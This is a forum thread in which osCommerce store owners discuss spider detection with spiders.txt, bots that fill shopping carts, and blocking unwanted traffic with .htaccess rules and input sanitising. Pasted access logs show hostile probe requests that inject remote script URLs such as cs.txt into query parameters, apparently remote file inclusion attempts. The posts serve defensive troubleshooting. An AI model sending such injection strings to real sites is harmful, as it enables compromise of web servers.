imusorka Posted August 18, 2007

Not really. I just figure it's a lot more data to read and loop through on every page access. Thanks for the reply.

I also have a question about bot names. The readme says: "For example, "ebot" matches Googlebot, "nbot" matches msnbot." Does this mean that these shortened names are now commonly understood by search engines when they spider a site?
stevel Posted August 18, 2007 (Author)

No. The purpose of spiders.txt is to let your osCommerce store recognize when a spider is visiting so that it won't be assigned a session. There is no need for, nor any attempt at, identifying which particular spider is visiting. For example, lots of spiders have the string "crawl" in their user agent (it may show up as "Crawler", etc.), and the single string "crawl" matches all of them. Similarly, a number of spiders, including Googlebot, have the string "ebot" in their user agent, and non-spider visitors (we hope) never do. Therefore, any user agent string containing "ebot" as a substring is deemed a spider.

The search engines never look at this file, nor do they care about it. The only things that matter are that a spider is identified as a spider and that a non-spider isn't incorrectly deemed one. Using substrings is simply a way to optimize the detection, that is all.

Steve

Contributions: Country-State Selector, Login Page a la Amazon, Protection of Configuration, Updated spiders.txt, Embed Links with SID in Description
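The substring matching Steve describes can be sketched in a few lines of PHP. This is a minimal illustration, not the osCommerce source: `is_spider()` and the inline pattern list are hypothetical, and a real store would load the patterns from spiders.txt (for example with `file()`, which is why each entry is trimmed). It also speaks to the worry about looping on every page access: the user agent is lowercased once and the loop stops at the first match.

```php
<?php
// Minimal sketch of substring-based spider detection. The function name and
// the inline pattern list are hypothetical; a real store reads spiders.txt.

/**
 * Returns true if any non-empty pattern occurs anywhere in the user agent.
 * The user agent is lowercased first, so patterns are expected in lowercase.
 */
function is_spider(string $userAgent, array $patterns): bool
{
    $ua = strtolower($userAgent);
    if ($ua === '') {
        return false; // nothing to match against
    }
    foreach ($patterns as $pattern) {
        $pattern = trim($pattern); // lines read with file() keep their newline
        if ($pattern !== '' && strpos($ua, $pattern) !== false) {
            return true; // first hit is enough; stop looping
        }
    }
    return false;
}

// Patterns as they might come from file('spiders.txt').
$patterns = ["crawl\n", "ebot\n", "nbot\n", "heritrix\n"];

var_dump(is_spider('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', $patterns)); // bool(true)
var_dump(is_spider('msnbot/1.0 (+http://search.msn.com/msnbot.htm)', $patterns)); // bool(true)
var_dump(is_spider('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', $patterns)); // bool(false)
```

Note that nothing here identifies *which* spider matched; "ebot" catches Googlebot and "nbot" catches msnbot, which is all the store needs to decide against a session.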
imusorka Posted August 18, 2007

I was confused by the term "substring" when I first came across your contribution, Steve. Thanks for clarifying!
Irin Posted November 4, 2007

Hello,

For a while now, a range of IP addresses has been visiting my site, requesting just one page at a time and adding random products to the cart. The last octet of the IP address is different every time:

82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.73 - - [04/Nov/2007:14:03:28 -0700] "GET /featured_products.php?osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 46332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.49 - - [04/Nov/2007:14:21:26 -0700] "GET /product_reviews.php?pName=adapt&products_id=317&language=en&osCsid=4bdff8b680aa49b36c5b88b40e7b1e2d HTTP/1.0" 200 36282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.22 - - [04/Nov/2007:14:29:51 -0700] "GET /my_points_help.php?language=de HTTP/1.0" 200 45147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.68 - - [04/Nov/2007:14:38:44 -0700] "GET /gv_faq.php?language=de HTTP/1.0" 200 34604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.11 - - [04/Nov/2007:15:06:48 -0700] "GET /product_info.php?pName=adapt&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.67 - - [04/Nov/2007:15:14:03 -0700] "GET /product_info.php?language=de&pName=control&cName=control&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 51933 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.4 - - [04/Nov/2007:16:01:19 -0700] "GET /index.php?sort=4a&page=1&cName=modules&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.21 - - [04/Nov/2007:16:32:21 -0700] "GET /product_info.php?pName=kit-20&cName=kits&osCsid=ba8f7b14c77e6d9df1c521d15400e98b HTTP/1.0" 200 45094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
etc.

What can I do about it?

Thanks.
beaman Posted December 10, 2007

I'm having the same problem with a wide range of IPs. I have almost 40 to 50 different visitors with strange IP addresses. I replaced my old spiders.txt file with the new one, and this started happening after that. Take a look at this; I need help:

00:08:30 0 Guest 99.228.214.14 03:02:48 03:02:48 /
00:08:29 0 Guest 24.71.223.148 03:02:49 03:02:49 /shopping_cart.php
00:08:21 0 Guest 24.71.223.148 03:02:57 03:02:57 /satellite-accessories-c-51.html
00:07:58 0 Guest 24.71.223.148 03:03:20 03:03:20 /satellite-accessories-satellite-finders-c-51_56.html
00:07:42 0 Guest 24.71.223.148 03:03:36 03:03:36 /font-color0000ffabout-c-59.html
00:07:30 0 Guest 99.228.214.14 03:03:48 03:03:48 /captiveworks-receivers-c-41.html
00:18:09 0 Guest 71.245.29.105 02:53:09 02:56:40 /satellite-accessories-satellite-motors-c-51_57.html
00:02:43 0 Guest 24.71.223.148 03:08:35 03:08:35 /shopping_cart.php
00:02:42 0 Guest 38.113.177.227 03:08:36 03:08:36 /other-electronics-electronics-c-38_37.html
00:00:08 0 Guest 76.64.204.111 03:11:10 03:11:10 /
00:00:38 0 Guest 216.197.133.146 03:10:40 03:10:40 /
00:11:05 0 Guest 142.177.229.37 03:00:13 03:00:13 /
00:10:49 0 Guest 24.71.223.148 03:00:29 03:00:29 /satellite-dishes-c-52.html
00:10:10 0 Guest 24.71.223.148 03:01:08 03:01:08 /captiveworks-receivers-c-41.html
00:09:54 0 Guest 24.71.223.148 03:01:24 03:01:24 /shopping_cart.php?sort=2a
00:09:34 0 Guest 24.71.223.148 03:01:44 03:01:44 /shopping_cart.php
00:09:26 0 Guest 24.71.223.148 03:01:52 03:01:52 /captiveworks-receivers-c-41.html
00:07:00 0 Guest 24.71.223.148 03:04:18 03:04:18 /create_account.php
00:02:01 0 Guest 24.71.223.148 03:09:17 03:09:17 /shopping_cart.php?sort=2a
00:02:17 0 Guest 24.71.223.148 03:09:01 03:09:01 /satellite-dishes-c-52.html
00:05:30 0 Guest 99.228.214.14 03:05:48 03:05:48 /captiveworks-receivers-c-41.html
00:09:06 0 Guest 24.71.223.148 03:02:12 03:02:12 /index.php
00:05:43 0 Guest 67.158.176.139 03:05:35 03:05:35 /
00:55:07 0 Guest 66.249.67.131 02:16:11 02:58:48 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e
00:03:00 0 Guest 24.71.223.148 03:08:18 03:08:18 /index.php
00:03:25 0 Guest 24.71.223.148 03:07:53 03:07:53 /create_account.php
00:08:34 0 Guest 65.92.100.150 03:02:44 03:02:44 /
00:03:21 0 Guest 24.71.223.148 03:07:57 03:07:57 /create_account_success.php
00:08:51 0 Guest 24.71.223.148 03:02:27 03:02:27 /products_new.php
00:09:15 0 Guest 24.71.223.148 03:02:03 03:02:03 /shopping_cart.php?sort=2a
00:06:41 0 Guest 99.228.214.14 03:04:37 03:04:37 /captiveworks-receivers-c-41.html
00:14:13 0 Guest 142.177.229.37 02:57:05 02:57:05 /pansat-receivers-c-49.html
00:13:58 0 Guest 142.177.229.37 02:57:20 02:58:45 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e
00:04:47 0 Guest 99.228.214.14 03:06:31 03:06:31 /captain-receivers-c-43.html
00:01:39 0 Guest 24.71.223.148 03:09:39 03:09:39 /login.php
00:01:54 0 Guest 38.113.177.227 03:09:24 03:09:24 /captiveworks-cw800s-receiver-p-174.html
00:16:06 0 Guest 142.177.229.37 02:55:12 03:00:07 /index.php?currency=USD&osCsid=8e5b46b96e49fd026113e76b774d8e0f
00:12:15 0 Guest 24.71.223.148 02:59:03 02:59:03 /
00:11:53 0 Guest 65.92.100.150 02:59:25 02:59:25 /
00:11:24 0 Guest 142.177.229.37 02:59:54 02:59:54 /other-electronics-cameras-c-38_28.html
00:11:15 0 Guest 142.177.229.37 03:00:03 03:00:03 /pansat-receivers-c-49.html
00:04:13 0 Guest 24.71.223.148 03:07:05 03:07:05 /create_account.php
00:02:09 0 Guest 38.113.177.227 03:09:09 03:09:09 /
00:10:23 0 Guest 24.71.223.148 03:00:55 03:00:55 /shopping_cart.php?sort=2a

Currently there are 44 customers online

Please help. This has been happening for the last 72 hours. Every time I check Who's Online I see this, with different numbers.
webstarter Posted December 18, 2007

Hi there,

I've just added the updated spiders-large.txt and renamed it to spiders.txt as instructed. I'm still getting the bots below, as you will see from the image. Any advice? I'm new to all this, so if you could explain it to me that would be great.

Thank you.

Regards,
Ian
stevel Posted December 23, 2007 (Author)

It looks as if my subscription to this topic expired again. Sigh...

Ian,

The purpose of spiders.txt is NOT to prevent bots from spidering your site. Rather, it is to ensure that those bots don't get sessions, so that they don't include session IDs in the links they index and they stay out of functions that require a session (such as Add to Cart).

Irina,

The entries you show come from (or are pretending to come from) an ordinary user's browser. I agree that they look suspicious, but there's nothing spiders.txt can do for you, since the user agent string is that of a normal browser. What you can do is add a "Deny from" entry to your .htaccess file to block accesses from this IP range, e.g. Deny from 82.99.30

irfan (beaman),

We would need to see the access log entries; a "Who's online" report is not sufficient. I will say that many of these look like normal users (cable modem customers, etc.)
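A partial address such as "Deny from 82.99.30" is matched on whole leading octets, so it covers 82.99.30.0 through 82.99.30.255, which is exactly the range in Irin's log. The PHP sketch below only illustrates which addresses such a prefix catches (and why a range ban can also catch legitimate visitors who share it); `ip_in_partial_range()` is a hypothetical helper, and in practice Apache does this matching itself.

```php
<?php
// Minimal sketch of partial-IP matching, as used by a rule like
// "Deny from 82.99.30". The function name is hypothetical.

function ip_in_partial_range(string $ip, string $prefix): bool
{
    // Appending "." makes the match stop at an octet boundary, so the
    // prefix "82.99.3" does not accidentally match "82.99.30.48".
    return strpos($ip, rtrim($prefix, '.') . '.') === 0;
}

$blocked = ['82.99.30'];

foreach (['82.99.30.48', '82.99.30.73', '82.99.3.10', '99.228.214.14'] as $ip) {
    $hit = false;
    foreach ($blocked as $prefix) {
        if (ip_in_partial_range($ip, $prefix)) {
            $hit = true;
            break;
        }
    }
    echo $ip, ' => ', $hit ? 'deny (403)' : 'allow', "\n";
}
```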
dsolutions Posted January 8, 2008

I seem to be having an issue with "amazonaws". Is this a new spider? I have the most up-to-date spiders file.

Thanks,
Evan
stevel Posted January 8, 2008 (Author)

It doesn't seem to be a regular spider. It could be someone writing code based on Amazon Web Services. I will check my logs to see if I have hits from it, but yesterday's log doesn't show anything.

What are you seeing: spider-like activity across many links? Please provide some sample lines from the web access log.
dsolutions Posted January 8, 2008

I am about to block the IP address, but I really don't want to.

I'm not sure how to provide the web access log, but here is a sample of what I think you want:

/-p-100.html?language=es
Http Code: 200  Date: Jan 08 12:39:59  Http Version: HTTP/1.0  Size in Bytes: 15209
Referer: http://www.ganodermacoffee.com/product_inf...products_id=100
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

/-p-99.html?language=es
Http Code: 200  Date: Jan 08 12:40:12  Http Version: HTTP/1.0  Size in Bytes: 15201
Referer: http://www.ganodermacoffee.com/-p-99.html
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

/-p-99.html?language=en
Http Code: 200  Date: Jan 08 12:40:22  Http Version: HTTP/1.0  Size in Bytes: 15790
Referer: http://www.ganodermacoffee.com/-p-99.html
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

/-pr-99.html
Http Code: 200  Date: Jan 08 12:40:33  Http Version: HTTP/1.0  Size in Bytes: 13829
Referer: http://www.ganodermacoffee.com/-p-99.html
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

/-p-102.html?language=es
Http Code: 200  Date: Jan 08 12:40:47  Http Version: HTTP/1.0  Size in Bytes: 15215
Referer: http://www.ganodermacoffee.com/product_inf...products_id=102
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

/-p-102.html?language=en
Http Code: 200  Date: Jan 08 12:41:05  Http Version: HTTP/1.0  Size in Bytes: 15843
Referer: http://www.ganodermacoffee.com/product_inf...products_id=102
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

-----------------------
01:39:40 Guest ec2-72-44-49-100.z-1.compute-1.amazonaws.com 11:10:13 12:49:53 Gano Coffee Club (Product) Yes Yes
Name: Guest
ID: 0
IP Address: 72.44.49.100
User Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]
osCsid: 49a31cd29bce4cd3e1e32bc4ff5462e6
------------------

It seems to just keep cycling through the products, adding one of each to the cart, and now it has started adding a second item to the cart for each product.

Referer?: http://www.ganodermacoffee.com/
stevel Posted January 8, 2008 (Author)

Ah. This should be caught by the "heritrix" entry in spiders.txt. Perhaps your store is not configured to use spiders.txt?

I would feel better if I saw entries from an actual access log.

Edited January 8, 2008 by stevel
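Steve's guess that the store may not be using spiders.txt can be illustrated like this: the spiders.txt lookup only matters when spider-session prevention is switched on (in stock osCommerce 2.2 this should be the "Prevent Spider Sessions" option under Configuration > Sessions). With the switch off, heritrix is treated like any visitor, gets an osCsid, and can add items to the cart, which matches what Evan reports. The function and flag names are hypothetical; this is a sketch of the logic, not the osCommerce code.

```php
<?php
// Minimal sketch, assuming a store-wide on/off switch like osCommerce's
// "Prevent Spider Sessions" option. should_start_session() and
// $preventSpiderSessions are hypothetical names, not osCommerce code.

function should_start_session(string $userAgent, array $patterns, bool $preventSpiderSessions): bool
{
    if (!$preventSpiderSessions) {
        // spiders.txt is never consulted, so every visitor gets a session.
        return true;
    }
    $ua = strtolower($userAgent);
    foreach ($patterns as $pattern) {
        $pattern = trim($pattern);
        if ($pattern !== '' && strpos($ua, $pattern) !== false) {
            // Recognised spider: no session, hence no osCsid and no cart.
            return false;
        }
    }
    return true;
}

// User agent from the log excerpt above (trailing email field omitted).
$ua = 'Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)';
$patterns = ['heritrix'];

var_dump(should_start_session($ua, $patterns, false)); // bool(true): switch off, heritrix gets a session
var_dump(should_start_session($ua, $patterns, true));  // bool(false): switch on, heritrix is treated as a spider
```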
Andreas2003 Posted January 15, 2008

Hi Steve,

I got many hits today from "spider5.mail.ru", IP 195.239.211.234. Browser identification: "Mail.Ru/1.0".

I don't know whether you already have this little fellow in your files?

Regards,
Andreas

Edited January 15, 2008 by Andreas2003
stevel Posted January 15, 2008 (Author)

I haven't seen that one yet and can't find any obvious indication of what it is.
Irin Posted January 30, 2008

I noticed some suspicious activity on my website. It's either a spider or a script running continuously. It visits my website throughout the day, makes one click at a time, and always uses a different IP, so it's hard to block. Here is what I have in my access_log:

67.68.206.67 - - [30/Jan/2008:05:33:36 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
67.68.206.67 - - [30/Jan/2008:05:34:07 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.53.156.125 - - [30/Jan/2008:05:41:44 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.53.156.125 - - [30/Jan/2008:05:41:52 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72170 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48422 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48471 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
124.104.84.192 - - [30/Jan/2008:05:43:32 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67772 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
124.104.84.192 - - [30/Jan/2008:05:43:45 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66375 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
64.231.108.203 - - [30/Jan/2008:05:51:28 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:51:32 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48219 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:52:15 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48399 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
64.231.108.203 - - [30/Jan/2008:05:52:21 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
69.159.62.217 - - [30/Jan/2008:06:20:32 -0700] "GET /index.php?sort=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 200 48296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"
124.104.84.192 - - [30/Jan/2008:06:37:02 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67776 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
124.104.84.192 - - [30/Jan/2008:06:37:17 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66337 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
67.68.206.67 - - [30/Jan/2008:07:15:23 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
and so on...

Can anybody please explain what's going on and whether there is anything I can do about it? Any help will be appreciated. Thanks.

Edited January 30, 2008 by Irin
stevel Posted January 30, 2008 (Author)

It's checking whether it can use your site to redirect URLs in spam emails.

If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:

RewriteEngine On
RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

If you already have the RewriteEngine line in there, don't repeat it.

This will cause every attempt to access your site with a URL in the parameters to fail with a 403 (Forbidden) response.
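For anyone who would rather do the same test in PHP near the top of the request (before any output), the RewriteCond above boils down to a literal ":/" search in the raw query string. A minimal sketch; `query_string_has_url()` is a hypothetical helper, not part of osCommerce, and the live-request lines are shown only as a comment.

```php
<?php
// Minimal sketch of the RewriteCond test: refuse any request whose raw query
// string contains ":/". Like %{QUERY_STRING}, $_SERVER['QUERY_STRING'] holds
// the undecoded query string. The function name is hypothetical.

function query_string_has_url(string $queryString): bool
{
    return strpos($queryString, ':/') !== false;
}

// In a live request one might use it like this, before any output:
//   if (query_string_has_url($_SERVER['QUERY_STRING'] ?? '')) {
//       http_response_code(403);
//       exit;
//   }

$samples = [
    'pName=http://hotraebywka.chat.ru/images/girl?', // probe from the log
    'sort=4a&page=1&cName=modules',                  // normal listing page
];
foreach ($samples as $qs) {
    echo $qs, ' => ', query_string_has_url($qs) ? '403 Forbidden' : 'allowed', "\n";
}
```

The [NC] flag makes no difference here, since ":/" contains no letters.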
Irin Posted January 30, 2008

Hi Stevel,

Is this the feature on product_info.php that says "For more information, please visit this product's webpage."? If so, I do use it. I added your code to my .htaccess file. Do you think it will stop the script from running?

Thanks for your help.
stevel Posted January 30, 2008 (Author)

Yes, that's the feature. You'll probably find that those links stop working. This can be worked around by changing the product URL so that it does not include the "http://" part.
Irin Posted January 30, 2008

Stevel,

Thanks a lot for your help. Since I added your code to my .htaccess file, I don't see any more strange URLs accessing my website; it has stopped all the attempts to use my website for suspicious purposes. The redirect feature also seems to be working fine. The URL used to redirect to the product's web page is http://myshop.com/redirect.php?action=url&...cts%2Fpage.html. Thanks to you, I got this problem sorted.

Thanks again.
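A likely reason the product-page redirect kept working: if the link passes the target address through `urlencode()` (the `%2F` in Irin's redirect URL suggests it is encoded), then "://" becomes "%3A%2F%2F", and the rule only inspects the raw, undecoded query string. This is an inference from the one truncated URL above, not something confirmed in the thread; the `goto` parameter name, host and path in the sketch are assumptions.

```php
<?php
// Sketch assuming the product link passes the target URL urlencode()d in a
// "goto" parameter. Parameter name, host and path are placeholders.

$target = 'http://www.example.com/products/page.html';
$queryString = 'action=url&goto=' . urlencode($target);

echo $queryString, "\n";
// action=url&goto=http%3A%2F%2Fwww.example.com%2Fproducts%2Fpage.html

// The .htaccess rule looks for a literal ":/" in the raw query string.
var_dump(strpos($queryString, ':/') !== false); // bool(false): rule does not fire

// An unencoded URL, as in the spam probes, does contain ":/".
var_dump(strpos('pName=' . $target, ':/') !== false); // bool(true): rule fires
```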
stevel Posted January 30, 2008 (Author)

You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.
Irin Posted January 30, 2008

Yep, I can see some "403" errors in my log, but they are all for these strange URLs:

70.51.76.179 - - [30/Jan/2008:12:42:17 -0700] "GET /index.php?sort=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
76.67.138.251 - - [30/Jan/2008:12:37:56 -0700] "GET /index.php?sort=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
76.67.138.251 - - [30/Jan/2008:12:37:05 -0700] "GET /product_info.php?pName=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 314 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
64.229.149.191 - - [30/Jan/2008:12:33:45 -0700] "GET /index.php?sort=http://migirlinme.krovatka.su/index? HTTP/1.1" 403 307 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

Some other URLs are also showing up in my log file; maybe you know what these are:

196.217.86.107 - - [30/Jan/2008:12:53:45 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://all-patch.org/vb/showthread.php?p=764145#post764145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)"
212.76.72.252 - - [30/Jan/2008:12:54:23 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"
212.76.72.252 - - [30/Jan/2008:12:54:24 -0700] "GET /images/prod.jpg HTTP/1.1" 200 9061 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

Again, thanks for your help.

Edited January 30, 2008 by Irin
♥FWR Media Posted January 30, 2008

Using .htaccess really ought to be (IMO) a last, dirty resort in these cases. After all, we are talking about simply sanitising the $_GET variable. (Maybe you set $_REQUEST = $_GET + $_POST (after sanitising, of course) like me... who needs $_COOKIE, for god's sake?)

$_GET is often multidimensional, so why not use a recursive cleaner, something like:

$_GET = clean_get__recursive($_GET);

function clean_get__recursive($get_var) {
  // Nested arrays (e.g. ?filter[color]=red): clean each element recursively.
  if (is_array($get_var)) {
    return array_map('clean_get__recursive', $get_var);
  }
  // Scalars: strip everything except letters, digits, space, underscore, dot and hyphen.
  return preg_replace('/[^a-zA-Z0-9 _.-]/', '', $get_var);
}

The preg_replace may be too heavy for some, but the concept is sound.

Edited January 30, 2008 by Babygurgles

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls
KissMT Dynamic SEO Meta & Canonical Header Tags
KissER Error Handling and Debugging
KissIT Image Thumbnailer
Security Pro - Querystring protection against hackers (a KISS contribution)
If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work.
stevel Posted January 31, 2008 (Author)

Robert, that's an interesting idea, but it doesn't signal to the spammers that they should go away. There's no legitimate reason to have ":/" in a $_GET parameter, so the .htaccess rule takes care of it simply.
♥FWR Media Posted January 31, 2008

Perhaps a nice little error page saying #!@#! off! :D

Anyway... I'm leading this thread off topic. Back to spiders.txt, I think.

Edited January 31, 2008 by Babygurgles
maxxxie Posted February 3, 2008

GAH! Livebot BEGONE!

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this user agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osC session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on), and doesn't play nice with spiders.txt.

Any idea how I can prevent this bot from creating sessions?

Cheers,
Max
Bushmaster Posted February 3, 2008

If it uses the same IP every time, just ban the IP from your site. I believe there is an add-on for that, or you can use .htaccess: http://tools.dynamicdrive.com/userban/

IP bans are not a 100% remedy and can easily ban a potential customer if you are not careful.